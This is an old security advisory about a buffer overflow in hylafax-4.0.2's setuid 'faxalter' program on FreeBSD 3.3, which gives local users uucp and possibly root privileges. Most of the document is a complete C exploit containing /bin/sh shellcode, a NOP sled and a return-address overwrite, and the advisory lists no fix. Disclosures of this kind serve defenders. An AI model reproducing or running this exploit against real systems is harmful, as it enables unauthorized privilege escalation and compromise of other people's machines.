COMMAND

    hylafax

SYSTEMS AFFECTED

    hylafax-4.0.2

PROBLEM

    Brock  Tellier  found  following.    A  vulnerability  exists   in
    "faxalter", part  of the  hylafax-4.0.2 package  which will  allow
    any user  gain uucp  and possibly  root privs.   These tests  were
    done  only  on  FreeBSD  3.3-RELEASE  which  includes  the hylafax
    package as an "additional package" on the install CD.  Of  course,
    hylafax  runs  on  many  different  platforms  thus anyone running
    hylafax  should   check  out   his  or   her  version   for   this
    vulnerability.

    The  faxalter  program  is  installed  suid-uucp  by  default when
    installed from the FreeBSD-3.3  CD hylafax package.   This program
    is contains a  buffer overflow which  will allow any  user to gain
    uucp privs.  This could become a root-compromise considering  that
    uucp has write access to several programs (such as minicom, cu and
    ecu on FreeBSD 3.3)  and could potentially trojan  these programs.
    In addition to this, the suid-root "hfaxd" program reads/writes to
    several uucp-owned  files.   At the  very least,  a malicious user
    could  intercept  all  faxes,  uucp  transmitions and be generally
    annoying.

    /*
     * Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp)
     * Brock Tellier btellier@usa.net
     */
    
    #include <stdio.h>
    
    char shell[]= /* mudge@lopht.com */
       "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
       "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
       "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
       "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
    
    
    main (int argc, char *argv[] ) {
     int x = 0;
     int y = 0;
     int offset = 0;
     int bsize = 4093; /* overflowed buf's bytes + 4(ebp) + 4(eip) + 1 */
     char buf[bsize];
     int eip = 0xbfbfcfad;
    
     if (argv[1]) {
       offset = atoi(argv[1]);
       eip = eip + offset;
     }
     fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
    
     for ( x = 0; x < 4021; x++) buf[x] = 0x90;
         fprintf(stderr, "NOPs to %d\n", x);
    
     for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
         fprintf(stderr, "Shellcode to %d\n",x);
    
      buf[x++] = eip & 0x000000ff;
      buf[x++] = (eip & 0x0000ff00) >> 8;
      buf[x++] = (eip & 0x00ff0000) >> 16;
      buf[x++] = (eip & 0xff000000) >> 24;
         fprintf(stderr, "eip to %d\n",x);
    
     buf[bsize - 1]='\0';
    
     execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL);
    
    }

SOLUTION

    Nothing yet.